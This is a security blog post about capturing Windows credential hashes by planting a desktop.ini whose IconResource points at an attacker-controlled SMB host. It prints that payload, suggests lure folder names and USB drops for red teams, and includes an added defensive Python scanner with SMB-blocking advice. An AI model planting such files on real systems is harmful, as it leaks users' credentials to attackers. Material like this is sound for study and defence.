Malware Not Needed?

2018-12-23T01:14:21+00:00 | December 17 2018

I recently had a *duh* moment while playing with the ‘opened folder’ canary technique used by http://canarytokens.org/, a Thinkst project.

One of the Canary triggers works by taking advantage of the way Microsoft Windows presents folders to its users: Explorer checks for a hidden desktop.ini file that points the OS to the folder's view preferences.

Canary works by directing the preferences to a remote server; when that request comes in, we know the folder has been entered… very sneaky! (I didn’t know about this technique until I was exploring the payloads available on canarytokens.org – check them out: https://canarytokens.org/generate)

So I figured, if we point it to a remote location with SMB authentication on it, we know that Windows will automatically send its current user’s credentials to that location, so I’ll get hashes!

[.ShellClassInfo]
IconResource=\\IP_or_domain_you_control\resource.dll

If you are ever on a red team and you have access to a shared folder, plant one in there (you will need to make the share read-only for the desktop.ini to persist) with a name like PeopleGettingSacked or Movies or CEO Holiday Pics… whatever, you know better than me…

Additionally, if you put the desktop.ini flat on a USB stick, as soon as the pen is mounted (unless auto-run is disabled) it will open up the folder automatically, actioning the attack.

I bet this is already being used out there! … very sneaky/powerful, I had to share… in fact, I can’t help thinking this might be a very well known thing and I’m out of the loop -_-

I think there is some caching of the desktop.ini too (at least with Windows 10), as when I ejected my evil USB I could still see incoming requests from my machine – will follow up on that.
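As an added defensive example (my code, not from the original post or from Thinkst): a Python scan that walks a share or USB mount and reports every desktop.ini whose IconResource or IconFile points at a UNC host outside an allowlist, since Explorer rendering such a folder is what triggers the outbound SMB authentication. The key names, the UNC regex, the trusted-host list and the sample inputs in the test are my assumptions, not something the post specifies.

```python
"""Added example (not from the original post): find desktop.ini files whose icon
keys point at a remote UNC host, the setup that makes Explorer send SMB auth."""
import configparser
import os
import re
from pathlib import Path

RESOURCE_KEYS = ("iconresource", "iconfile")   # keys Explorer resolves as icon file paths
# \\host\share or //host/share, optional '@' resource prefix; skips \\?\ and \\.\ device paths
UNC_RE = re.compile(r"^@?[\\/]{2}([^\\/?.][^\\/]*)[\\/]")

def decode_ini(raw: bytes) -> str:
    """Windows writes desktop.ini as ANSI/UTF-8 or UTF-16 with a BOM; choose by BOM."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")

def unc_references(text: str) -> list:
    """Return [(key, host, value)] for icon keys under [.ShellClassInfo] that name a UNC host."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cp.read_string(text)
    hits = []
    for section in cp.sections():
        if section.lower() != ".shellclassinfo":   # Explorer matches the section case-insensitively
            continue
        for key, value in cp.items(section):       # configparser lower-cases keys for us
            if key not in RESOURCE_KEYS or not value:
                continue
            v = value.strip().strip('"')
            m = UNC_RE.match(v)
            if m:
                hits.append((key, m.group(1).lower(), v))
    return hits

def scan_tree(root, trusted_hosts=()) -> list:
    """Walk a share or USB mount; report desktop.ini entries pointing at hosts not on the allowlist."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != "desktop.ini":
                continue
            path = Path(dirpath) / name
            try:
                refs = unc_references(decode_ini(path.read_bytes()))
            except (OSError, configparser.Error):
                continue   # unreadable or not INI-shaped; not a UNC reference we can act on
            for key, host, value in refs:
                if host not in trusted:
                    findings.append({"path": str(path), "key": key, "host": host, "value": value})
    return findings
```

Run `scan_tree(r"\\fileserver\share", trusted_hosts=["fileserver01"])` against a mounted share; a hit on a host you do not recognise is exactly the IconResource trick described above, and blocking outbound SMB (TCP 445) at the perimeter is the usual mitigation for the credential leak.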


An in-depth look at the options available when writing a desktop.ini file, possibly more opportunities for trouble: https://hwiegman.home.xs4all.nl/desktopini.html

Attacker & user view: https://www.youtube.com/watch?v=t8zqJm5d8gg